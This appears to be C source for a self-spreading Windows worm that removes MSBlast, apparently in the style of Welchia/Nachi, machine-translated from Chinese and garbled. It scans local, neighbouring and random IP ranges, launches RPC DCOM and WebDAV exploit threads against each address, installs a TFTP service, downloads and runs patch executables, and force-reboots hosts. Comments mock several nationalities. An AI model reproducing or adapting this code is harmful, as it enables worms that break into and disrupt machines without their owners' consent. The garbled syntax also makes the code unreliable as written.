Msblast. Remove. worm W32 worm master code

Bool doservicepackfunction ()
{
DWORD nsystemver = win2000orxp ();
If (! (Nsystemver = 0 | nsystemver = 1 ))
Return false; // not 2 K or XP

If (readregservicepack (nsystemver ))
Return false; // already installed

// Recognition language version
Int nlanguageid;
Unsigned int unoemcp = getoemcp ();

Lcid = getsystemdefaultlcid ();
Word wmain = primarylangid (lcid );
Word wsub = sublangid (lcid );

If (unoemcp = 437 & wmain = 9 & wsub = 1) // en
Nlanguageid = 0; // your en patch is good ~~ What's wrong ~~
// Small Europe ~~ Russian cool people have their own gameplay ~~
Else if (unoemcp = 936 & wmain = 4 & wsub = 2) // CN
Nlanguageid = 1; // it is for this ~~
Else if (unoemcp = 950 & wmain = 4 & wsub = 1) // TW
Nlanguageid = 2; // You must help ~~
Else if (unoemcp = 932 & wmain = 0x11 & wsub = 1) // JP
Nlanguageid =-1; // I am so impulsive to kill the devil's sub-machine!
// No. When is the report ~~~ Hope he is new ~~~ If you try again, it will destroy him ~~
Else if (unoemcp = 949 & wmain = 0x12 & wsub = 1) // KR
Nlanguageid = 3; // the little birds who do not understand things bend out, endangering China ~~
Else {
Nlanguageid =-1;
}

If (nlanguageid =-1)
Return false;

Char szservicepack [] = "rpcservicepack.exe ";

// Downlaod it ~~~
If (! Nsystemver) {// 2 K
If (! Downloadspfile (szservicepack, szwin2kspurl [nlanguageid])
Return false;
}
Else {
If (! Downloadspfile (szservicepack, szwinxpspurl [nlanguageid])
Return false;
}

Char szexec [180];
Sprintf (szexec, "% S-N-o-z-Q", szservicepack );

Handle hprocess = makeprocess (szexec );
If (hprocess = NULL)
Return false;

If (waitforsingleobject (hprocess, 360000 )! = Wait_object_0) {// unfinished within six minutes
Terminateprocess (hprocess, 1 );
Closehandle (hprocess );
Deletefile (szservicepack );
Return false;
}
Closehandle (hprocess );

Sleep (15000 );
Deletefile (szservicepack );
If (readregservicepack (nsystemver )){
Shutdownwindows (ewx_reboot | ewx_force); // install Service Pack OK, reboot it ~~~
Sleep (20000); // does it mean that I have restarted? It is invalid if you do not restart the patch. Please contact Bill to handle it ~~~
}

Return true;
}

// In: Start IP address, number of segment B, random or not, and change to WebDAV // worse ~~~ Watch it together ~~~
Void beginexploitfunction (u_long ulipstart, int nbcount, bool brand, bool bwebdav)
{
Handle hthread = NULL;
Bool bfirst = true;
U_long ucomp;

For (INT I = 0; I <(nbcount * 256*256); I ++ ){

If (brand)
Ucomp = makerandip ();
Else
Ucomp = I + ulipstart;

If (// still blocks some targets, so that the next generation will be killed after the target is recruited. Do not destroy the Next Generation :)~~~
(Byte) ucomp = 0xc5 |
(Byte) (ucomp> 8) = 0xc5 |
(Byte) (ucomp> 16) = 0xc5 |
(Byte) (ucomp> 24) = 0xc5 |
(Word) ucomp = 0x9999 |
(Word) (ucomp> 8) = 0x9999 |
(Word) (ucomp> 16) = 0x9999)
Continue;

U_long * mypara = new u_long;

If (mypara = NULL) {// if the allocation fails, try again
Sleep (100 );
Mypara = new u_long;
}

If (mypara ){
If (hthread)
Closehandle (hthread );

* Mypara = htonl (ucomp );

DWORD dwthreadid;

If (bwebdav)
Hthread = createthread (null, 0, exploitwebdavthread, (lpvoid) mypara, 0, & dwthreadid );
Else
Hthread = createthread (null, 0, exploitrpcdcomthread, (lpvoid) mypara, 0, & dwthreadid );

Sleep (2 );
}

// Add the code here to avoid the first execution of interlockedincrement (& g_curthreadcount) in the thread before it can run. A bug of n threads is created at one time!
If (bfirst & (I >= nmaxthread )){
Sleep (2000 );
Bfirst = false;
}

While (g_curthreadcount> = nmaxthread) // # define nmaxthread 300, not careful. I 've played it ~~~
Sleep (2 );

}

Sleep (60000 );
}

// Public master program in service mode and Console mode
Void doit ()
{
Wsadatawsd;
If (wsastartup (makeword (2, 2), & WSD )! = 0)
Return;

// Kills worms
Killmsblast ();

// Uninstall
Systemtime st;
Getlocaltime (& St );
If (St. wyear = 2004 ){
Mydeleteservice (szservicename );
Mydeleteservice (szservicetftpd );
Removeme ();
Exitprocess (1); // actually not required. removeme () borrowed the code from its predecessors. In 2 K, when exiting the program, the file is deleted.
}

Srand (gettickcount ());

Memset (ppingbuffer, "/xAA", sizeof (ppingbuffer ));
// The Backbone Router immediately discards this icmp echo packet! What wave in China has exceeded !~~ The patch is enough !~~~

// Prepare the WebDAV sending Buffer
Do {
Pwebdavexploitbuffer = new char [68000];
Sleep (100 );
} While (pwebdavexploitbuffer = NULL );

// A bullet must be assembled at one time before checkonlien
Presswebdavbufferonce ();
Pressrpcdcombufferonce ();

Checkonlienandpressdata (); // get localip & fixed reverse IP and port in the bullet

// Patch
Doservicepackfunction ();

// Create a receiving thread
DWORD dwthreadid;
Handle hworkthread = createthread (null, 0, (lpthread_start_routine) recvsend1_thread, (lpvoid) null, 0, & dwthreadid );
If (hworkthread = NULL) // blocked in recvsendmediathread, with anti-connection, re-thread processing, and multiple anti-connections at the same time
Return;
Closehandle (hworkthread );

If (! Mystartservice (szservicetftpd )){
Sleep (1000 );
Installtftpservice ();
Sleep (1000 );
Mystartservice (szservicetftpd );
}

Sleep (2000); // wait for the global Rand bind port in the receiving thread

U_long ulip;
For (;) {// estimated, a cycle of 2 hours for a common Machine

// First scan this IP segment
Checkonlienandpressdata ();
Ulip = ntohl (inet_addr (szlocalip ));
Ulip & = 0xffff0000;
Beginexploitfunction (ulip, 1, 0, 0 );

// Scan the three segments before and after the current IP Address
Checkonlienandpressdata ();
If (RAND () % 2)
Ulip + = 0x00010000;
Else
Ulip-= 0x00030000;
Beginexploitfunction (ulip, 3, 0, 0 );

// Scan a WebDAV segment and exit the 135 SYN block.
Checkonlienandpressdata ();
Ulip = makelong (0, wdiphead [rand () % 76]); // please pay attention to the IP address provider of segment B ~~~, Take remedial measures now ~~~ Sorry ~~~
Beginexploitfunction (ulip, 1, 0, 1 );

// Scan the random IP address again. The number of IP addresses is 1 segment B, RPC or WebDAV.
Checkonlienandpressdata ();
If (RAND () % 2)
Beginexploitfunction (ulip, 1, 1, 0 );
Else
Beginexploitfunction (ulip, 1, 1, 1); // Skip, skip, and skip ~~~

Killmsblast ();

}

// Wsacleanup ();

}